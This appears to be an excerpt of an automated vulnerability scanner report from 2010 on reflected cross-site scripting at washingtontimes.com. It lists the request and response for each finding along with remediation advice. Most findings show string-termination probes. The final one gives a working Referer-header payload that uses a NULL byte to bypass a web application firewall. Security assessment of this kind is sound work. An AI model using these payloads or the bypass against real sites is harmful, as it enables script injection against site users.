This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video425a0"%3bc9e2b3827f6/two-guys-newsroom/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14576
Date: Mon, 13 Dec 2010 21:37:28 GMT
X-Varnish: 570589970
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="video425a0";c9e2b3827f6"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc792'%3b8f81c256a4e was submitted in the REST URL parameter 1. This input was echoed as cc792';8f81c256a4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videocc792'%3b8f81c256a4e/two-guys-newsroom/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14549
Date: Mon, 13 Dec 2010 21:37:38 GMT
X-Varnish: 570590219
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb01'%3b9b9fa5fcdbf was submitted in the REST URL parameter 1. This input was echoed as 4cb01';9b9fa5fcdbf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video4cb01'%3b9b9fa5fcdbf/waterman-washington/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14740
Date: Mon, 13 Dec 2010 21:36:41 GMT
X-Varnish: 570588739
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dccf7"%3bc5954d5673c was submitted in the REST URL parameter 1. This input was echoed as dccf7";c5954d5673c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videodccf7"%3bc5954d5673c/waterman-washington/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:36:32 GMT
X-Varnish: 570588502
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="videodccf7";c5954d5673c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd09f"%3b1b01d6b451 was submitted in the REST URL parameter 1. This input was echoed as dd09f";1b01d6b451 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videodd09f"%3b1b01d6b451/white-house-minute/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14544
Date: Mon, 13 Dec 2010 21:37:26 GMT
X-Varnish: 570589701
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error |
...[SNIP]...
cript">
window.dctile = Number(window.dctile) + 1 || 1;
if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""}
var size="728x90,960x250,960x30,900x30,900x300";
var type="videodd09f";1b01d6b451";
var site="wash.times";
var zone="";
var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15eeb'%3b5b29cd335cc was submitted in the REST URL parameter 1. This input was echoed as 15eeb';5b29cd335cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video15eeb'%3b5b29cd335cc/white-house-minute/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14576
Date: Mon, 13 Dec 2010 21:37:43 GMT
X-Varnish: 570590127
Age: 0
Via: 1.1 varnish
Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %002505b"-alert(1)-"d7e33bc0bde was submitted in the Referer HTTP header. This input was echoed as 2505b"-alert(1)-"d7e33bc0bde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, there have been methods that used client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='f
...[SNIP]...
iteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';
s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=171516&referer=%002505b"-alert(1)-"d7e33bc0bde";
document.getElementsByTagName('head')[0].appendChild(s);}})();